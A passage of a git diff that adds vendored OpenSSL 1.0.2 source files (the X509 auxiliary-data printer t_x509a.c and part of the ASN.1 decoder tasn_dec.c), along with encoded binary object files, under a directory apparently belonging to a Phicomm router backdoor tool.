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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_x509a.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_x509a.c
new file mode 100644
index 0000000..f4b8f94
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_x509a.c
@@ -0,0 +1,115 @@
+/* t_x509a.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/asn1.h>
+#include <openssl/x509.h>
+
+/*
+ * X509_CERT_AUX and string set routines
+ */
+
+int X509_CERT_AUX_print(BIO *out, X509_CERT_AUX *aux, int indent)
+{
+    char oidstr[80], first;
+    int i;
+    if (!aux)
+        return 1;
+    if (aux->trust) {
+        first = 1;
+        BIO_printf(out, "%*sTrusted Uses:\n%*s", indent, "", indent + 2, "");
+        for (i = 0; i < sk_ASN1_OBJECT_num(aux->trust); i++) {
+            if (!first)
+                BIO_puts(out, ", ");
+            else
+                first = 0;
+            OBJ_obj2txt(oidstr, sizeof oidstr,
+                        sk_ASN1_OBJECT_value(aux->trust, i), 0);
+            BIO_puts(out, oidstr);
+        }
+        BIO_puts(out, "\n");
+    } else
+        BIO_printf(out, "%*sNo Trusted Uses.\n", indent, "");
+    if (aux->reject) {
+        first = 1;
+        BIO_printf(out, "%*sRejected Uses:\n%*s", indent, "", indent + 2, "");
+        for (i = 0; i < sk_ASN1_OBJECT_num(aux->reject); i++) {
+            if (!first)
+                BIO_puts(out, ", ");
+            else
+                first = 0;
+            OBJ_obj2txt(oidstr, sizeof oidstr,
+                        sk_ASN1_OBJECT_value(aux->reject, i), 0);
+            BIO_puts(out, oidstr);
+        }
+        BIO_puts(out, "\n");
+    } else
+        BIO_printf(out, "%*sNo Rejected Uses.\n", indent, "");
+    if (aux->alias)
+        BIO_printf(out, "%*sAlias: %s\n", indent, "", aux->alias->data);
+    if (aux->keyid) {
+        BIO_printf(out, "%*sKey Id: ", indent, "");
+        for (i = 0; i < aux->keyid->length; i++)
+            BIO_printf(out, "%s%02X", i ? ":" : "", aux->keyid->data[i]);
+        BIO_write(out, "\n", 1);
+    }
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_x509a.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_x509a.o
new file mode 100644
index 0000000000000000000000000000000000000000..5d283ad7e8e295029ffbb90473cb6c22bcdf6f76
GIT binary patch
literal 3912
zcmbtWU2GIp6u#SS=~~NdMbT<i=Aku3>13y+($+{i`_oQ!LkV=HL}A>vQ?{_}!p^L=
zG$|%6>ZUHJZ$6li_+Vn9#up$yXrmax7fJkyFTM~Sn&3|i2_^=!o-=cAID5PMpq}LZ
zedjypo_p@SbLUhdIaC)2Fd+f9o81`+l(EZq-{}u}-9e_X&Fp6Q(Z7rX#&br>7)$Lp
zmw(AjnXC03oj@^*@%C|j%{+Z8ywXqy<K^9e{cRR+8pZF!E3W}1UW(Qw^k0)Dw>@NB
z2qa6J(Y0CX#U@$2vhEF6pYqyx|N2rqu~IICIl(OcE(r1BZwb9@l)v%-{mN&1JqLf9
z#V<T0S-d6KH$IlkZ)`Oy=GE7Hugi-e7G8N99r^lr@ftYM*Ak_8dmTgvkwefTT3iDU
zXVLFqz=`SsFNXe2#2?BLxABNYL|o6OkF}Vm*W7K%)j^oW54m!MVtuX5%^`y?AJ@h`
zCG_jbQWs`l_-u{$t4m!b_)MI>4rwq;TTwj{j{m@IqT%z+s=hW-zU0~5_~uhQNK)wL
zDjbR_v&TOoZUYbHQsyF(pFd>0U>q_I8`hU>fOS0XjO7cCYfq^u$94vq0AM>*)`Xfp
zIh86k58P)TwI?h2KD9#ObB*jw+8Izg9MAGudqEwU8c<n>(-G+&XKXkY8&Eq_6NNdq
zp!RD$TBJ+gRq%%TQg=j)?A-3dm<7h_p|n70fHJ%%#o)ZJAr^#!a-ZL@z{!0qFy9hr
zYi<m^2}@1_{xH`a1S2-2w4AMrDy?UNQAI7)N0rVu8Vn`!>Lx?!TW*Xi=K{f9bxPlm
z5;2rcpa3<hv_zE<cT%Il?AEhC%GK1tsy7~E7tvQ*1-;c)VmJzVtFMMPZUjAk^`L|7
zt_^(u^Ml!~6wEnhU5?Z{oPf7h(%D0t-zMSPIR1!)w{yH(!nbqWlyHsXhb6p+<5>ys
z<2ddQm8ZQy1DmHH?+4kY4QLFIEo2|Pvjo@yD1MGAO=fH0IA1mXsT%m}HSo7;;P2MJ
z->-o)*P8E*^ry8+rX^z$th%x4!D=T~y;wbo)h?|1u<FN3_o@gR2YV})*f(Ywsd4Lg
zerC>P)^Kt(Y9y`Ep`rbWF>B0-CKDEmj*R;HY33ZW<_fbuQg9s{zm(1vY&IHw#>!0`
z?RMu~Py2Fy#<iJcIc|FLm^GO>W=*GOvTQG`2L-P*p61(SUvNKA5O0Daa0@{Y{AN4=
zMc_ve1VJ3nvcSc;KtFgl1pW&2QIP*26oKP@pdgNSK;Z8o2!c4?34wovAc*Yef)9J~
zH$z|WKj*m2zfAZv58o0TAARBHN8*R(VV&@)p9X$$Fb@jx6XrO^L;bW8oaS>o@k8^e
z6F$vnjNmk%DT32{zDRKDXNKb#Kh5Wf8vK)lPxDYDc$nnj4Dmzr@B!gdKc5gBzXM`l
z&e!nsHQ`e~-x2&C;^$|AQ~tFY{%;fh7UHK769$6Ky--A)_j6p{_jbakdEP<z_znv{
z2Ep-75V#6`6jXDHH)fi%Fzco#pmp<pn-RUdolR@54Id0`D($A3HsLr-%ja-_bX|i_
z)nsmV)`l;WHkWg44SpfIye|qLADJs?$Md=4cHUh8Q*>x&tm%Au*7m3WzqJYuFxB$Q
zG6)!ocu)M1&lP=a@vLLc2cb|I=THAn{DH>1h4X|s3GX1vV^9#6-|=@Ul8j7W_^}W}
zwgY<T^S|2bV2eKGcV5ho?;jO0zi0<RiTwyALBEv;^n`>9JJF7SUi2w7CNGF9W$r=1
zG1YRqOm44oJJE>zi}4BQpikL8!|gMI$XnSy3wX8tkKl%bh<(N(-g{v$@M?3T-BmvS
oRUR1LUHrF`?a^noRGs4o`XcD5$oa!>R5g2($G=F8p)cG218ecj+W-In

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_dec.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_dec.c
new file mode 100644
index 0000000..4595664
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_dec.c
@@ -0,0 +1,1210 @@
+/* tasn_dec.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stddef.h>
+#include <string.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/objects.h>
+#include <openssl/buffer.h>
+#include <openssl/err.h>
+
+static int asn1_check_eoc(const unsigned char **in, long len);
+static int asn1_find_end(const unsigned char **in, long len, char inf);
+
+static int asn1_collect(BUF_MEM *buf, const unsigned char **in, long len,
+                        char inf, int tag, int aclass, int depth);
+
+static int collect_data(BUF_MEM *buf, const unsigned char **p, long plen);
+
+static int asn1_check_tlen(long *olen, int *otag, unsigned char *oclass,
+                           char *inf, char *cst,
+                           const unsigned char **in, long len,
+                           int exptag, int expclass, char opt, ASN1_TLC *ctx);
+
+static int asn1_template_ex_d2i(ASN1_VALUE **pval,
+                                const unsigned char **in, long len,
+                                const ASN1_TEMPLATE *tt, char opt,
+                                ASN1_TLC *ctx);
+static int asn1_template_noexp_d2i(ASN1_VALUE **val,
+                                   const unsigned char **in, long len,
+                                   const ASN1_TEMPLATE *tt, char opt,
+                                   ASN1_TLC *ctx);
+static int asn1_d2i_ex_primitive(ASN1_VALUE **pval,
+                                 const unsigned char **in, long len,
+                                 const ASN1_ITEM *it,
+                                 int tag, int aclass, char opt,
+                                 ASN1_TLC *ctx);
+
+/* Table to convert tags to bit values, used for MSTRING type */
+static const unsigned long tag2bit[32] = {
+    /* tags  0 -  3 */
+    0, 0, 0, B_ASN1_BIT_STRING,
+    /* tags  4- 7 */
+    B_ASN1_OCTET_STRING, 0, 0, B_ASN1_UNKNOWN,
+    /* tags  8-11 */
+    B_ASN1_UNKNOWN, B_ASN1_UNKNOWN, B_ASN1_UNKNOWN, B_ASN1_UNKNOWN,
+    /* tags 12-15 */
+    B_ASN1_UTF8STRING, B_ASN1_UNKNOWN, B_ASN1_UNKNOWN, B_ASN1_UNKNOWN,
+    /* tags 16-19 */
+    B_ASN1_SEQUENCE, 0, B_ASN1_NUMERICSTRING, B_ASN1_PRINTABLESTRING,
+    /* tags 20-22 */
+    B_ASN1_T61STRING, B_ASN1_VIDEOTEXSTRING, B_ASN1_IA5STRING,
+    /* tags 23-24 */
+    B_ASN1_UTCTIME, B_ASN1_GENERALIZEDTIME,
+    /* tags 25-27 */
+    B_ASN1_GRAPHICSTRING, B_ASN1_ISO64STRING, B_ASN1_GENERALSTRING,
+    /* tags 28-31 */
+    B_ASN1_UNIVERSALSTRING, B_ASN1_UNKNOWN, B_ASN1_BMPSTRING, B_ASN1_UNKNOWN,
+};
+
+unsigned long ASN1_tag2bit(int tag)
+{
+    if ((tag < 0) || (tag > 30))
+        return 0;
+    return tag2bit[tag];
+}
+
+/* Macro to initialize and invalidate the cache */
+
+#define asn1_tlc_clear(c)       if (c) (c)->valid = 0
+/* Version to avoid compiler warning about 'c' always non-NULL */
+#define asn1_tlc_clear_nc(c)    (c)->valid = 0
+
+/*
+ * Decode an ASN1 item, this currently behaves just like a standard 'd2i'
+ * function. 'in' points to a buffer to read the data from, in future we
+ * will have more advanced versions that can input data a piece at a time and
+ * this will simply be a special case.
+ */
+
+ASN1_VALUE *ASN1_item_d2i(ASN1_VALUE **pval,
+                          const unsigned char **in, long len,
+                          const ASN1_ITEM *it)
+{
+    ASN1_TLC c;
+    ASN1_VALUE *ptmpval = NULL;
+    if (!pval)
+        pval = &ptmpval;
+    asn1_tlc_clear_nc(&c);
+    if (ASN1_item_ex_d2i(pval, in, len, it, -1, 0, 0, &c) > 0)
+        return *pval;
+    return NULL;
+}
+
+int ASN1_template_d2i(ASN1_VALUE **pval,
+                      const unsigned char **in, long len,
+                      const ASN1_TEMPLATE *tt)
+{
+    ASN1_TLC c;
+    asn1_tlc_clear_nc(&c);
+    return asn1_template_ex_d2i(pval, in, len, tt, 0, &c);
+}
+
+/*
+ * Decode an item, taking care of IMPLICIT tagging, if any. If 'opt' set and
+ * tag mismatch return -1 to handle OPTIONAL
+ */
+
+int ASN1_item_ex_d2i(ASN1_VALUE **pval, const unsigned char **in, long len,
+                     const ASN1_ITEM *it,
+                     int tag, int aclass, char opt, ASN1_TLC *ctx)
+{
+    const ASN1_TEMPLATE *tt, *errtt = NULL;
+    const ASN1_COMPAT_FUNCS *cf;
+    const ASN1_EXTERN_FUNCS *ef;
+    const ASN1_AUX *aux = it->funcs;
+    ASN1_aux_cb *asn1_cb;
+    const unsigned char *p = NULL, *q;
+    unsigned char *wp = NULL;   /* BIG FAT WARNING! BREAKS CONST WHERE USED */
+    unsigned char imphack = 0, oclass;
+    char seq_eoc, seq_nolen, cst, isopt;
+    long tmplen;
+    int i;
+    int otag;
+    int ret = 0;
+    ASN1_VALUE **pchptr, *ptmpval;
+    if (!pval)
+        return 0;
+    if (aux && aux->asn1_cb)
+        asn1_cb = aux->asn1_cb;
+    else
+        asn1_cb = 0;
+
+    switch (it->itype) {
+    case ASN1_ITYPE_PRIMITIVE:
+        if (it->templates) {
+            /*
+             * tagging or OPTIONAL is currently illegal on an item template
+             * because the flags can't get passed down. In practice this
+             * isn't a problem: we include the relevant flags from the item
+             * template in the template itself.
+             */
+            if ((tag != -1) || opt) {
+                ASN1err(ASN1_F_ASN1_ITEM_EX_D2I,
+                        ASN1_R_ILLEGAL_OPTIONS_ON_ITEM_TEMPLATE);
+                goto err;
+            }
+            return asn1_template_ex_d2i(pval, in, len,
+                                        it->templates, opt, ctx);
+        }
+        return asn1_d2i_ex_primitive(pval, in, len, it,
+                                     tag, aclass, opt, ctx);
+        break;
+
+    case ASN1_ITYPE_MSTRING:
+        p = *in;
+        /* Just read in tag and class */
+        ret = asn1_check_tlen(NULL, &otag, &oclass, NULL, NULL,
+                              &p, len, -1, 0, 1, ctx);
+        if (!ret) {
+            ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ERR_R_NESTED_ASN1_ERROR);
+            goto err;
+        }
+
+        /* Must be UNIVERSAL class */
+        if (oclass != V_ASN1_UNIVERSAL) {
+            /* If OPTIONAL, assume this is OK */
+            if (opt)
+                return -1;
+            ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ASN1_R_MSTRING_NOT_UNIVERSAL);
+            goto err;
+        }
+        /* Check tag matches bit map */
+        if (!(ASN1_tag2bit(otag) & it->utype)) {
+            /* If OPTIONAL, assume this is OK */
+            if (opt)
+                return -1;
+            ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ASN1_R_MSTRING_WRONG_TAG);
+            goto err;
+        }
+        return asn1_d2i_ex_primitive(pval, in, len, it, otag, 0, 0, ctx);
+
+    case ASN1_ITYPE_EXTERN:
+        /* Use new style d2i */
+        ef = it->funcs;
+        return ef->asn1_ex_d2i(pval, in, len, it, tag, aclass, opt, ctx);
+
+    case ASN1_ITYPE_COMPAT:
+        /* we must resort to old style evil hackery */
+        cf = it->funcs;
+
+        /* If OPTIONAL see if it is there */
+        if (opt) {
+            int exptag;
+            p = *in;
+            if (tag == -1)
+                exptag = it->utype;
+            else
+                exptag = tag;
+            /*
+             * Don't care about anything other than presence of expected tag
+             */
+
+            ret = asn1_check_tlen(NULL, NULL, NULL, NULL, NULL,
+                                  &p, len, exptag, aclass, 1, ctx);
+            if (!ret) {
+                ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ERR_R_NESTED_ASN1_ERROR);
+                goto err;
+            }
+            if (ret == -1)
+                return -1;
+        }
+
+        /*
+         * This is the old style evil hack IMPLICIT handling: since the
+         * underlying code is expecting a tag and class other than the one
+         * present we change the buffer temporarily then change it back
+         * afterwards. This doesn't and never did work for tags > 30. Yes
+         * this is *horrible* but it is only needed for old style d2i which
+         * will hopefully not be around for much longer. FIXME: should copy
+         * the buffer then modify it so the input buffer can be const: we
+         * should *always* copy because the old style d2i might modify the
+         * buffer.
+         */
+
+        if (tag != -1) {
+            wp = *(unsigned char **)in;
+            imphack = *wp;
+            if (p == NULL) {
+                ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ERR_R_NESTED_ASN1_ERROR);
+                goto err;
+            }
+            *wp = (unsigned char)((*p & V_ASN1_CONSTRUCTED)
+                                  | it->utype);
+        }
+
+        ptmpval = cf->asn1_d2i(pval, in, len);
+
+        if (tag != -1)
+            *wp = imphack;
+
+        if (ptmpval)
+            return 1;
+
+        ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ERR_R_NESTED_ASN1_ERROR);
+        goto err;
+
+    case ASN1_ITYPE_CHOICE:
+        if (asn1_cb && !asn1_cb(ASN1_OP_D2I_PRE, pval, it, NULL))
+            goto auxerr;
+
+        /* Allocate structure */
+        if (!*pval && !ASN1_item_ex_new(pval, it)) {
+            ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ERR_R_NESTED_ASN1_ERROR);
+            goto err;
+        }
+        /* CHOICE type, try each possibility in turn */
+        p = *in;
+        for (i = 0, tt = it->templates; i < it->tcount; i++, tt++) {
+            pchptr = asn1_get_field_ptr(pval, tt);
+            /*
+             * We mark field as OPTIONAL so its absence can be recognised.
+             */
+            ret = asn1_template_ex_d2i(pchptr, &p, len, tt, 1, ctx);
+            /* If field not present, try the next one */
+            if (ret == -1)
+                continue;
+            /* If positive return, read OK, break loop */
+            if (ret > 0)
+                break;
+            /* Otherwise must be an ASN1 parsing error */
+            errtt = tt;
+            ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ERR_R_NESTED_ASN1_ERROR);
+            goto err;
+        }
+
+        /* Did we fall off the end without reading anything? */
+        if (i == it->tcount) {
+            /* If OPTIONAL, this is OK */
+            if (opt) {
+                /* Free and zero it */
+                ASN1_item_ex_free(pval, it);
+                return -1;
+            }
+            ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ASN1_R_NO_MATCHING_CHOICE_TYPE);
+            goto err;
+        }
+
+        asn1_set_choice_selector(pval, i, it);
+        *in = p;
+        if (asn1_cb && !asn1_cb(ASN1_OP_D2I_POST, pval, it, NULL))
+            goto auxerr;
+        return 1;
+
+    case ASN1_ITYPE_NDEF_SEQUENCE:
+    case ASN1_ITYPE_SEQUENCE:
+        p = *in;
+        tmplen = len;
+
+        /* If no IMPLICIT tagging set to SEQUENCE, UNIVERSAL */
+        if (tag == -1) {
+            tag = V_ASN1_SEQUENCE;
+            aclass = V_ASN1_UNIVERSAL;
+        }
+        /* Get SEQUENCE length and update len, p */
+        ret = asn1_check_tlen(&len, NULL, NULL, &seq_eoc, &cst,
+                              &p, len, tag, aclass, opt, ctx);
+        if (!ret) {
+            ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ERR_R_NESTED_ASN1_ERROR);
+            goto err;
+        } else if (ret == -1)
+            return -1;
+        if (aux && (aux->flags & ASN1_AFLG_BROKEN)) {
+            len = tmplen - (p - *in);
+            seq_nolen = 1;
+        }
+        /* If indefinite we don't do a length check */
+        else
+            seq_nolen = seq_eoc;
+        if (!cst) {
+            ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ASN1_R_SEQUENCE_NOT_CONSTRUCTED);
+            goto err;
+        }
+
+        if (!*pval && !ASN1_item_ex_new(pval, it)) {
+            ASN1err(ASN1_F_ASN1_ITEM_EX_D2I, ERR_R_NESTED_ASN1_ERROR);
+            goto err;
+        }
+
+        if (asn1_cb && !asn1_cb(ASN1_OP_D2I_PRE, pval, it, NULL))
+            goto auxerr;
+
